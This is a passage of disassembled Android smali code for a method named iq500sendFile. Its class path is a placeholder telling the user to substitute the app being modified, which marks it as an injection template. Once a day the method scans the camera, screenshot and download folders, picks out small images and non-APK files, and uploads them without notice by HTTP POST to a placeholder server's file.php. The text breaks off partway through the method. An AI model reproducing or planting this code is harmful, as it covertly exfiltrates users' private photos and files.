.method private iq500sendFile()V
    .registers 49
    .annotation system Ldalvik/annotation/Signature;
        value = {
            "()V"
        }
    .end annotation

    .prologue
    .line 70
    move-object/from16 v2, p0

    :try_start_2
    new-instance v38, Ljava/io/File;

    move-object/from16 v46, v38

    move-object/from16 v38, v46

    move-object/from16 v39, v46

    const-string v40, "/sdcard"

    invoke-direct/range {v39 .. v40}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    move-object/from16 v4, v38

    .line 71
    move-object/from16 v38, v4

    invoke-virtual/range {v38 .. v38}, Ljava/io/File;->canRead()Z

    move-result v38

    new-instance v39, Ljava/lang/Boolean;

    move/from16 v46, v38

    move-object/from16 v47, v39

    move-object/from16 v38, v47

    move/from16 v39, v46

    move-object/from16 v40, v47

    move/from16 v46, v39

    move-object/from16 v47, v40

    move-object/from16 v39, v47

    move/from16 v40, v46

    invoke-direct/range {v39 .. v40}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v5, v38

    .line 72
    move-object/from16 v38, v5

    check-cast v38, Ljava/lang/Boolean;

    invoke-virtual/range {v38 .. v38}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v38

    if-nez v38, :cond_3b

    .line 233
    :goto_3a
    return-void

    .line 81
    :cond_3b
    const/16 v38, 0x0

    new-instance v39, Ljava/lang/Boolean;

    move/from16 v46, v38

    move-object/from16 v47, v39

    move-object/from16 v38, v47

    move/from16 v39, v46

    move-object/from16 v40, v47

    move/from16 v46, v39

    move-object/from16 v47, v40

    move-object/from16 v39, v47

    move/from16 v40, v46

    invoke-direct/range {v39 .. v40}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v6, v38

    .line 82
    new-instance v38, Ljava/util/Date;

    move-object/from16 v46, v38

    move-object/from16 v38, v46

    move-object/from16 v39, v46

    invoke-direct/range {v39 .. v39}, Ljava/util/Date;-><init>()V

    move-object/from16 v7, v38

    .line 83
    move-object/from16 v38, v7

    invoke-virtual/range {v38 .. v38}, Ljava/util/Date;->getTime()J

    move-result-wide v38

    move-wide/from16 v8, v38

    .line 84
    move-object/from16 v38, v2

    const-string v39, "loadpref"

    const/16 v40, 0x0

    invoke-virtual/range {v38 .. v40}, Lchange/this_path_to_the_path_of_the_class_that_you_plan_to_modify/MainActivity;->getSharedPreferences(Ljava/lang/String;I)Landroid/content/SharedPreferences;

    move-result-object v38

    move-object/from16 v10, v38

    .line 85
    move-object/from16 v38, v10

    invoke-interface/range {v38 .. v38}, Landroid/content/SharedPreferences;->edit()Landroid/content/SharedPreferences$Editor;

    move-result-object v38

    move-object/from16 v11, v38

    .line 87
    move-object/from16 v38, v10

    const-string v39, "lastUpload"

    const/16 v40, 0x0

    move/from16 v0, v40

    int-to-long v0, v0

    move-wide/from16 v40, v0

    invoke-interface/range {v38 .. v41}, Landroid/content/SharedPreferences;->getLong(Ljava/lang/String;J)J

    move-result-wide v38

    move-wide/from16 v12, v38

    .line 89
    move-wide/from16 v38, v12

    const/16 v40, 0x0

    move/from16 v0, v40

    int-to-long v0, v0

    move-wide/from16 v40, v0

    cmp-long v38, v38, v40

    if-eqz v38, :cond_af

    move-wide/from16 v38, v8

    move-wide/from16 v40, v12

    sub-long v38, v38, v40

    const v40, 0x5265c00

    move/from16 v0, v40

    int-to-long v0, v0

    move-wide/from16 v40, v0

    cmp-long v38, v38, v40

    if-ltz v38, :cond_da

    .line 91
    :cond_af
    move-object/from16 v38, v11

    const-string v39, "lastUpload"

    move-wide/from16 v40, v8

    invoke-interface/range {v38 .. v41}, Landroid/content/SharedPreferences$Editor;->putLong(Ljava/lang/String;J)Landroid/content/SharedPreferences$Editor;

    move-result-object v38

    .line 92
    move-object/from16 v38, v11

    invoke-interface/range {v38 .. v38}, Landroid/content/SharedPreferences$Editor;->commit()Z

    move-result v38

    .line 93
    const/16 v38, 0x1

    new-instance v39, Ljava/lang/Boolean;

    move/from16 v46, v38

    move-object/from16 v47, v39

    move-object/from16 v38, v47

    move/from16 v39, v46

    move-object/from16 v40, v47

    move/from16 v46, v39

    move-object/from16 v47, v40

    move-object/from16 v39, v47

    move/from16 v40, v46

    invoke-direct/range {v39 .. v40}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v6, v38

    .line 97
    :cond_da
    move-object/from16 v38, v6

    check-cast v38, Ljava/lang/Boolean;

    invoke-virtual/range {v38 .. v38}, Ljava/lang/Boolean;->booleanValue()Z
    :try_end_e1
    .catch Ljava/lang/Exception; {:try_start_2 .. :try_end_e1} :catch_657

    move-result v38

    if-eqz v38, :cond_2b3

    .line 101
    :try_start_e4
    new-instance v38, Landroid/os/StrictMode$ThreadPolicy$Builder;

    move-object/from16 v46, v38

    move-object/from16 v38, v46

    move-object/from16 v39, v46

    invoke-direct/range {v39 .. v39}, Landroid/os/StrictMode$ThreadPolicy$Builder;-><init>()V

    invoke-virtual/range {v38 .. v38}, Landroid/os/StrictMode$ThreadPolicy$Builder;->permitAll()Landroid/os/StrictMode$ThreadPolicy$Builder;

    move-result-object v38

    invoke-virtual/range {v38 .. v38}, Landroid/os/StrictMode$ThreadPolicy$Builder;->build()Landroid/os/StrictMode$ThreadPolicy;

    move-result-object v38

    move-object/from16 v14, v38

    .line 102
    move-object/from16 v38, v14

    invoke-static/range {v38 .. v38}, Landroid/os/StrictMode;->setThreadPolicy(Landroid/os/StrictMode$ThreadPolicy;)V

    .line 105
    const-string v38, "/sdcard/DCIM/Camera/"

    move-object/from16 v15, v38

    .line 106
    const-string v38, "/sdcard/DCIM/Screenshots/"

    move-object/from16 v16, v38

    .line 107
    const-string v38, "/sdcard/Download/"

    move-object/from16 v17, v38

    .line 109
    new-instance v38, Ljava/io/File;

    move-object/from16 v46, v38

    move-object/from16 v38, v46

    move-object/from16 v39, v46

    move-object/from16 v40, v15

    invoke-direct/range {v39 .. v40}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    move-object/from16 v18, v38

    .line 110
    new-instance v38, Ljava/io/File;

    move-object/from16 v46, v38

    move-object/from16 v38, v46

    move-object/from16 v39, v46

    move-object/from16 v40, v16

    invoke-direct/range {v39 .. v40}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    move-object/from16 v19, v38

    .line 111
    new-instance v38, Ljava/io/File;

    move-object/from16 v46, v38

    move-object/from16 v38, v46

    move-object/from16 v39, v46

    move-object/from16 v40, v17

    invoke-direct/range {v39 .. v40}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    move-object/from16 v20, v38

    .line 114
    move-object/from16 v38, v18

    invoke-virtual/range {v38 .. v38}, Ljava/io/File;->list()[Ljava/lang/String;

    move-result-object v38

    move-object/from16 v21, v38

    .line 115
    move-object/from16 v38, v20

    invoke-virtual/range {v38 .. v38}, Ljava/io/File;->list()[Ljava/lang/String;

    move-result-object v38

    move-object/from16 v22, v38

    .line 118
    move-object/from16 v38, v21

    if-nez v38, :cond_157

    .line 120
    move-object/from16 v38, v19

    invoke-virtual/range {v38 .. v38}, Ljava/io/File;->list()[Ljava/lang/String;

    move-result-object v38

    move-object/from16 v21, v38

    .line 121
    move-object/from16 v38, v16

    move-object/from16 v15, v38

    .line 125
    :cond_157
    const-string v38, ""

    move-object/from16 v23, v38

    .line 126
    const-string v38, ""

    move-object/from16 v24, v38

    .line 128
    move-object/from16 v38, v21

    if-eqz v38, :cond_176

    .line 129
    const/16 v38, 0x0

    move/from16 v25, v38

    :goto_167
    move/from16 v38, v25

    move-object/from16 v39, v21

    move-object/from16 v0, v39

    array-length v0, v0

    move/from16 v39, v0

    move/from16 v0, v38

    move/from16 v1, v39

    if-lt v0, v1, :cond_2b5

    .line 148
    :cond_176
    move-object/from16 v38, v22

    if-eqz v38, :cond_18d

    .line 149
    const/16 v38, 0x0

    move/from16 v25, v38

    :goto_17e
    move/from16 v38, v25

    move-object/from16 v39, v22

    move-object/from16 v0, v39

    array-length v0, v0

    move/from16 v39, v0

    move/from16 v0, v38

    move/from16 v1, v39

    if-lt v0, v1, :cond_475

    .line 163
    :cond_18d
    move-object/from16 v38, v23

    const-string v39, "///n"

    invoke-virtual/range {v38 .. v39}, Ljava/lang/String;->split(Ljava/lang/String;)[Ljava/lang/String;

    move-result-object v38

    move-object/from16 v25, v38

    .line 164
    move-object/from16 v38, v24

    const-string v39, "///n"

    invoke-virtual/range {v38 .. v39}, Ljava/lang/String;->split(Ljava/lang/String;)[Ljava/lang/String;

    move-result-object v38

    move-object/from16 v26, v38

    .line 165
    const-string v38, ""

    move-object/from16 v27, v38

    .line 166
    const-string v38, ""

    move-object/from16 v28, v38

    .line 167
    const/16 v38, 0x0

    move/from16 v0, v38

    int-to-long v0, v0

    move-wide/from16 v38, v0

    move-wide/from16 v29, v38

    .line 168
    const/16 v38, 0x0

    move/from16 v0, v38

    int-to-long v0, v0

    move-wide/from16 v38, v0

    move-wide/from16 v31, v38

    .line 170
    const/16 v38, 0x0

    move/from16 v33, v38

    :goto_1bf
    move/from16 v38, v33

    move-object/from16 v39, v25

    move-object/from16 v0, v39

    array-length v0, v0

    move/from16 v39, v0

    move/from16 v0, v38

    move/from16 v1, v39

    if-lt v0, v1, :cond_5d7

    .line 178
    const/16 v38, 0x0

    move/from16 v33, v38

    :goto_1d2
    move/from16 v38, v33

    move-object/from16 v39, v26

    move-object/from16 v0, v39

    array-length v0, v0

    move/from16 v39, v0

    move/from16 v0, v38

    move/from16 v1, v39

    if-lt v0, v1, :cond_60c

    .line 187
    move-object/from16 v38, v27

    const-string v39, ""

    move-object/from16 v0, v38

    move-object/from16 v1, v39

    if-eq v0, v1, :cond_24a

    .line 190
    new-instance v38, Ljava/io/File;

    move-object/from16 v46, v38

    move-object/from16 v38, v46

    move-object/from16 v39, v46

    move-object/from16 v40, v27

    invoke-direct/range {v39 .. v40}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    move-object/from16 v33, v38

    .line 193
    new-instance v38, Lorg/apache/http/entity/FileEntity;

    move-object/from16 v46, v38

    move-object/from16 v38, v46

    move-object/from16 v39, v46

    move-object/from16 v40, v33

    const-string v41, "binary/octet-stream"

    invoke-direct/range {v39 .. v41}, Lorg/apache/http/entity/FileEntity;-><init>(Ljava/io/File;Ljava/lang/String;)V

    move-object/from16 v34, v38

    .line 196
    new-instance v38, Lorg/apache/http/client/methods/HttpPost;

    move-object/from16 v46, v38

    move-object/from16 v38, v46

    move-object/from16 v39, v46

    const-string v40, "http://{localhost}/file.php"

    invoke-direct/range {v39 .. v40}, Lorg/apache/http/client/methods/HttpPost;-><init>(Ljava/lang/String;)V

    move-object/from16 v35, v38

    .line 199
    move-object/from16 v38, v35

    move-object/from16 v39, v34

    invoke-virtual/range {v38 .. v39}, Lorg/apache/http/client/methods/HttpPost;->setEntity(Lorg/apache/http/HttpEntity;)V

    .line 200
    move-object/from16 v38, v34

    const-string v39, "binary/octet-stream"

    invoke-virtual/range {v38 .. v39}, Lorg/apache/http/entity/FileEntity;->setContentType(Ljava/lang/String;)V

    .line 203
    move-object/from16 v38, v35

    const-string v39, "lmod"

    move-wide/from16 v40, v29

    invoke-static/range {v40 .. v41}, Ljava/lang/String;->valueOf(J)Ljava/lang/String;

    move-result-object v40

    invoke-virtual/range {v38 .. v40}, Lorg/apache/http/client/methods/HttpPost;->setHeader(Ljava/lang/String;Ljava/lang/String;)V

    .line 206
    new-instance v38, Lorg/apache/http/impl/client/DefaultHttpClient;

    move-object/from16 v46, v38

    move-object/from16 v38, v46

    move-object/from16 v39, v46

    invoke-direct/range {v39 .. v39}, Lorg/apache/http/impl/client/DefaultHttpClient;-><init>()V

    move-object/from16 v36, v38

    .line 207
    move-object/from16 v38, v36

    move-object/from16 v39, v35

    invoke-interface/range {v38 .. v39}, Lorg/apache/http/client/HttpClient;->execute(Lorg/apache/http/client/methods/HttpUriRequest;)Lorg/apache/http/HttpResponse;

    move-result-object v38

    .line 211
    :cond_24a
    move-object/from16 v38, v28

    const-string v39, ""

    move-object/from16 v0, v38

    move-object/from16 v1, v39

    if-eq v0, v1, :cond_2b3

    .line 213
    new-instance v38, Ljava/io/File;

    move-object/from16 v46, v38

    move-object/from16 v38, v46

    move-object/from16 v39, v46

    move-object/from16 v40, v28

    invoke-direct/range {v39 .. v40}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    move-object/from16 v33, v38

    .line 214
    new-instance v38, Lorg/apache/http/entity/FileEntity;

    move-object/from16 v46, v38

    move-object/from16 v38, v46

    move-object/from16 v39, v46

    move-object/from16 v40, v33

    const-string v41, "binary/octet-stream"

    invoke-direct/range {v39 .. v41}, Lorg/apache/http/entity/FileEntity;-><init>(Ljava/io/File;Ljava/lang/String;)V

    move-object/from16 v34, v38

    .line 215
    new-instance v38, Lorg/apache/http/client/methods/HttpPost;

    move-object/from16 v46, v38

    move-object/from16 v38, v46

    move-object/from16 v39, v46

    const-string v40, "http://{localhost}/file.php"

    invoke-direct/range {v39 .. v40}, Lorg/apache/http/client/methods/HttpPost;-><init>(Ljava/lang/String;)V

    move-object/from16 v35, v38

    .line 217
    move-object/from16 v38, v35

    move-object/from16 v39, v34

    invoke-virtual/range {v38 .. v39}, Lorg/apache/http/client/methods/HttpPost;->setEntity(Lorg/apache/http/HttpEntity;)V

    .line 218
    move-object/from16 v38, v34

    const-string v39, "binary/octet-stream"

    invoke-virtual/range {v38 .. v39}, Lorg/apache/http/entity/FileEntity;->setContentType(Ljava/lang/String;)V

    .line 219
    move-object/from16 v38, v35

    const-string v39, "fname"

    move-object/from16 v40, v33

    invoke-virtual/range {v40 .. v40}, Ljava/io/File;->getName()Ljava/lang/String;

    move-result-object v40

    invoke-virtual/range {v38 .. v40}, Lorg/apache/http/client/methods/HttpPost;->setHeader(Ljava/lang/String;Ljava/lang/String;)V

    .line 220
    new-instance v38, Lorg/apache/http/impl/client/DefaultHttpClient;

    move-object/from16 v46, v38

    move-object/from16 v38, v46

    move-object/from16 v39, v46

    invoke-direct/range {v39 .. v39}, Lorg/apache/http/impl/client/DefaultHttpClient;-><init>()V

    move-object/from16 v36, v38

    .line 221
    move-object/from16 v38, v36

    move-object/from16 v39, v35

    invoke-interface/range {v38 .. v39}, Lorg/apache/http/client/HttpClient;->execute(Lorg/apache/http/client/methods/HttpUriRequest;)Lorg/apache/http/HttpResponse;

    move-result-object v38

    .line 233
    :cond_2b3
    :goto_2b3
    goto/16 :goto_3a

    .line 131
    :cond_2b5
    move-object/from16 v38, v21

    move/from16 v39, v25

    aget-object v38, v38, v39

    const-string v39, ".jpg"

    invoke-virtual/range {v38 .. v39}, Ljava/lang/String;->endsWith(Ljava/lang/String;)Z

    move-result v38

    new-instance v39, Ljava/lang/Boolean;

    move/from16 v46, v38

    move-object/from16 v47, v39

    move-object/from16 v38, v47

    move/from16 v39, v46

    move-object/from16 v40, v47

    move/from16 v46, v39

    move-object/from16 v47, v40

    move-object/from16 v39, v47

    move/from16 v40, v46

    invoke-direct/range {v39 .. v40}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v26, v38

    .line 132
    move-object/from16 v38, v21

    move/from16 v39, v25

    aget-object v38, v38, v39

    const-string v39, ".jpeg"

    invoke-virtual/range {v38 .. v39}, Ljava/lang/String;->endsWith(Ljava/lang/String;)Z

    move-result v38

    new-instance v39, Ljava/lang/Boolean;

    move/from16 v46, v38

    move-object/from16 v47, v39

    move-object/from16 v38, v47

    move/from16 v39, v46

    move-object/from16 v40, v47

    move/from16 v46, v39

    move-object/from16 v47, v40

    move-object/from16 v39, v47

    move/from16 v40, v46

    invoke-direct/range {v39 .. v40}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v27, v38

    .line 133
    move-object/from16 v38, v21

    move/from16 v39, v25

    aget-object v38, v38, v39

    const-string v39, ".png"

    invoke-virtual/range {v38 .. v39}, Ljava/lang/String;->endsWith(Ljava/lang/String;)Z

    move-result v38

    new-instance v39, Ljava/lang/Boolean;

    move/from16 v46, v38

    move-object/from16 v47, v39

    move-object/from16 v38, v47

    move/from16 v39, v46

    move-object/from16 v40, v47

    move/from16 v46, v39

    move-object/from16 v47, v40

    move-object/from16 v39, v47

    move/from16 v40, v46

    invoke-direct/range {v39 .. v40}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v28, v38

    .line 134
    new-instance v38, Ljava/io/File;

    move-object/from16 v46, v38

    move-object/from16 v38, v46

    move-object/from16 v39, v46

    new-instance v40, Ljava/lang/StringBuffer;

    move-object/from16 v46, v40

    move-object/from16 v40, v46

    move-object/from16 v41, v46

    invoke-direct/range {v41 .. v41}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v41, v15

    invoke-virtual/range {v40 .. v41}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v40

    move-object/from16 v41, v21

    move/from16 v42, v25

    aget-object v41, v41, v42

    invoke-virtual/range {v40 .. v41}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v40

    invoke-virtual/range {v40 .. v40}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v40

    invoke-direct/range {v39 .. v40}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    invoke-virtual/range {v38 .. v38}, Ljava/io/File;->length()J

    move-result-wide v38

    const/16 v40, 0x400

    move/from16 v0, v40

    int-to-long v0, v0

    move-wide/from16 v40, v0

    div-long v38, v38, v40

    const/16 v40, 0x400

    move/from16 v0, v40

    int-to-long v0, v0

    move-wide/from16 v40, v0

    div-long v38, v38, v40

    const/16 v40, 0xa

    move/from16 v0, v40

    int-to-long v0, v0

    move-wide/from16 v40, v0

    cmp-long v38, v38, v40

    if-lez v38, :cond_471

    const/16 v38, 0x0

    :goto_371
    new-instance v39, Ljava/lang/Boolean;

    move/from16 v46, v38

    move-object/from16 v47, v39

    move-object/from16 v38, v47

    move/from16 v39, v46

    move-object/from16 v40, v47

    move/from16 v46, v39

    move-object/from16 v47, v40

    move-object/from16 v39, v47

    move/from16 v40, v46

    invoke-direct/range {v39 .. v40}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v29, v38

    .line 135
    new-instance v38, Ljava/io/File;

    move-object/from16 v46, v38

    move-object/from16 v38, v46

    move-object/from16 v39, v46

    new-instance v40, Ljava/lang/StringBuffer;

    move-object/from16 v46, v40

    move-object/from16 v40, v46

    move-object/from16 v41, v46

    invoke-direct/range {v41 .. v41}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v41, v15

    invoke-virtual/range {v40 .. v41}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v40

    move-object/from16 v41, v21

    move/from16 v42, v25

    aget-object v41, v41, v42

    invoke-virtual/range {v40 .. v41}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v40

    invoke-virtual/range {v40 .. v40}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v40

    invoke-direct/range {v39 .. v40}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    invoke-virtual/range {v38 .. v38}, Ljava/io/File;->isFile()Z

    move-result v38

    new-instance v39, Ljava/lang/Boolean;

    move/from16 v46, v38

    move-object/from16 v47, v39

    move-object/from16 v38, v47

    move/from16 v39, v46

    move-object/from16 v40, v47

    move/from16 v46, v39

    move-object/from16 v47, v40

    move-object/from16 v39, v47

    move/from16 v40, v46

    invoke-direct/range {v39 .. v40}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v30, v38

    .line 137
    move-object/from16 v38, v26

    check-cast v38, Ljava/lang/Boolean;

    invoke-virtual/range {v38 .. v38}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v38

    if-nez v38, :cond_3ef

    move-object/from16 v38, v27

    check-cast v38, Ljava/lang/Boolean;

    invoke-virtual/range {v38 .. v38}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v38

    if-nez v38, :cond_3ef

    move-object/from16 v38, v28

    check-cast v38, Ljava/lang/Boolean;

    invoke-virtual/range {v38 .. v38}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v38

    if-eqz v38, :cond_46d

    :cond_3ef
    move-object/from16 v38, v29

    check-cast v38, Ljava/lang/Boolean;

    invoke-virtual/range {v38 .. v38}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v38

    if-eqz v38, :cond_46d

    move-object/from16 v38, v30

    check-cast v38, Ljava/lang/Boolean;

    invoke-virtual/range {v38 .. v38}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v38

    if-eqz v38, :cond_46d

    .line 139
    new-instance v38, Ljava/lang/StringBuffer;

    move-object/from16 v46, v38

    move-object/from16 v38, v46

    move-object/from16 v39, v46

    invoke-direct/range {v39 .. v39}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v39, v23

    invoke-virtual/range {v38 .. v39}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v38

    new-instance v39, Ljava/lang/StringBuffer;

    move-object/from16 v46, v39

    move-object/from16 v39, v46

    move-object/from16 v40, v46

    invoke-direct/range {v40 .. v40}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v40, v15

    invoke-virtual/range {v39 .. v40}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v39

    move-object/from16 v40, v21

    move/from16 v41, v25

    aget-object v40, v40, v41

    invoke-virtual/range {v39 .. v40}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v39

    invoke-virtual/range {v39 .. v39}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v39

    invoke-virtual/range {v38 .. v39}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v38

    invoke-virtual/range {v38 .. v38}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v38

    move-object/from16 v23, v38

    .line 141
    move/from16 v38, v25

    move-object/from16 v39, v21

    move-object/from16 v0, v39

    array-length v0, v0

    move/from16 v39, v0

    const/16 v40, 0x1

    add-int/lit8 v39, v39, -0x1

    move/from16 v0, v38

    move/from16 v1, v39

    if-ge v0, v1, :cond_46d

    .line 142
    new-instance v38, Ljava/lang/StringBuffer;

    move-object/from16 v46, v38

    move-object/from16 v38, v46

    move-object/from16 v39, v46

    invoke-direct/range {v39 .. v39}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v39, v23

    invoke-virtual/range {v38 .. v39}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v38

    const-string v39, "///n"

    invoke-virtual/range {v38 .. v39}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v38

    invoke-virtual/range {v38 .. v38}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v38

    move-object/from16 v23, v38

    .line 129
    :cond_46d
    add-int/lit8 v25, v25, 0x1

    goto/16 :goto_167

    .line 134
    :cond_471
    const/16 v38, 0x1

    goto/16 :goto_371

    .line 151
    :cond_475
    move-object/from16 v38, v22

    move/from16 v39, v25

    aget-object v38, v38, v39

    const-string v39, ".apk"

    invoke-virtual/range {v38 .. v39}, Ljava/lang/String;->endsWith(Ljava/lang/String;)Z

    move-result v38

    new-instance v39, Ljava/lang/Boolean;

    move/from16 v46, v38

    move-object/from16 v47, v39

    move-object/from16 v38, v47

    move/from16 v39, v46

    move-object/from16 v40, v47

    move/from16 v46, v39

    move-object/from16 v47, v40

    move-object/from16 v39, v47

    move/from16 v40, v46

    invoke-direct/range {v39 .. v40}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v26, v38

    .line 152
    new-instance v38, Ljava/io/File;

    move-object/from16 v46, v38

    move-object/from16 v38, v46

    move-object/from16 v39, v46

    new-instance v40, Ljava/lang/StringBuffer;

    move-object/from16 v46, v40

    move-object/from16 v40, v46

    move-object/from16 v41, v46

    invoke-direct/range {v41 .. v41}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v41, v17

    invoke-virtual/range {v40 .. v41}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v40

    move-object/from16 v41, v22

    move/from16 v42, v25

    aget-object v41, v41, v42

    invoke-virtual/range {v40 .. v41}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v40

    invoke-virtual/range {v40 .. v40}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v40

    invoke-direct/range {v39 .. v40}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    invoke-virtual/range {v38 .. v38}, Ljava/io/File;->length()J

    move-result-wide v38

    const/16 v40, 0x400

    move/from16 v0, v40

    int-to-long v0, v0

    move-wide/from16 v40, v0

    div-long v38, v38, v40

    const/16 v40, 0x400

    move/from16 v0, v40

    int-to-long v0, v0

    move-wide/from16 v40, v0

    div-long v38, v38, v40

    const/16 v40, 0x5

    move/from16 v0, v40

    int-to-long v0, v0

    move-wide/from16 v40, v0

    cmp-long v38, v38, v40

    if-lez v38, :cond_5d3

    const/16 v38, 0x0

    :goto_4e7
    new-instance v39, Ljava/lang/Boolean;

    move/from16 v46, v38

    move-object/from16 v47, v39

    move-object/from16 v38, v47

    move/from16 v39, v46

    move-object/from16 v40, v47

    move/from16 v46, v39

    move-object/from16 v47, v40

    move-object/from16 v39, v47

    move/from16 v40, v46

    invoke-direct/range {v39 .. v40}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v27, v38

    .line 153
    new-instance v38, Ljava/io/File;

    move-object/from16 v46, v38

    move-object/from16 v38, v46

    move-object/from16 v39, v46

    new-instance v40, Ljava/lang/StringBuffer;

    move-object/from16 v46, v40

    move-object/from16 v40, v46

    move-object/from16 v41, v46

    invoke-direct/range {v41 .. v41}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v41, v17

    invoke-virtual/range {v40 .. v41}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v40

    move-object/from16 v41, v22

    move/from16 v42, v25

    aget-object v41, v41, v42

    invoke-virtual/range {v40 .. v41}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v40

    invoke-virtual/range {v40 .. v40}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v40

    invoke-direct/range {v39 .. v40}, Ljava/io/File;-><init>(Ljava/lang/String;)V

    invoke-virtual/range {v38 .. v38}, Ljava/io/File;->isFile()Z

    move-result v38

    new-instance v39, Ljava/lang/Boolean;

    move/from16 v46, v38

    move-object/from16 v47, v39

    move-object/from16 v38, v47

    move/from16 v39, v46

    move-object/from16 v40, v47

    move/from16 v46, v39

    move-object/from16 v47, v40

    move-object/from16 v39, v47

    move/from16 v40, v46

    invoke-direct/range {v39 .. v40}, Ljava/lang/Boolean;-><init>(Z)V

    move-object/from16 v28, v38

    .line 154
    move-object/from16 v38, v26

    check-cast v38, Ljava/lang/Boolean;

    invoke-virtual/range {v38 .. v38}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v38

    if-nez v38, :cond_5cf

    move-object/from16 v38, v27

    check-cast v38, Ljava/lang/Boolean;

    invoke-virtual/range {v38 .. v38}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v38

    if-eqz v38, :cond_5cf

    move-object/from16 v38, v28

    check-cast v38, Ljava/lang/Boolean;

    invoke-virtual/range {v38 .. v38}, Ljava/lang/Boolean;->booleanValue()Z

    move-result v38

    if-eqz v38, :cond_5cf

    .line 156
    new-instance v38, Ljava/lang/StringBuffer;

    move-object/from16 v46, v38

    move-object/from16 v38, v46

    move-object/from16 v39, v46

    invoke-direct/range {v39 .. v39}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v39, v24

    invoke-virtual/range {v38 .. v39}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v38

    new-instance v39, Ljava/lang/StringBuffer;

    move-object/from16 v46, v39

    move-object/from16 v39, v46

    move-object/from16 v40, v46

    invoke-direct/range {v40 .. v40}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v40, v17

    invoke-virtual/range {v39 .. v40}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v39

    move-object/from16 v40, v22

    move/from16 v41, v25

    aget-object v40, v40, v41

    invoke-virtual/range {v39 .. v40}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v39

    invoke-virtual/range {v39 .. v39}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v39

    invoke-virtual/range {v38 .. v39}, Ljava/lang/StringBuffer;->append(Ljava/lang/String;)Ljava/lang/StringBuffer;

    move-result-object v38

    invoke-virtual/range {v38 .. v38}, Ljava/lang/StringBuffer;->toString()Ljava/lang/String;

    move-result-object v38

    move-object/from16 v24, v38

    .line 158
    move/from16 v38, v25

    move-object/from16 v39, v22

    move-object/from16 v0, v39

    array-length v0, v0

    move/from16 v39, v0

    const/16 v40, 0x1

    add-int/lit8 v39, v39, -0x1

    move/from16 v0, v38

    move/from16 v1, v39

    if-ge v0, v1, :cond_5cf

    .line 159
    new-instance v38, Ljava/lang/StringBuffer;

    move-object/from16 v46, v38

    move-object/from16 v38, v46

    move-object/from16 v39, v46

    invoke-direct/range {v39 .. v39}, Ljava/lang/StringBuffer;-><init>()V

    move-object/from16 v39, v24

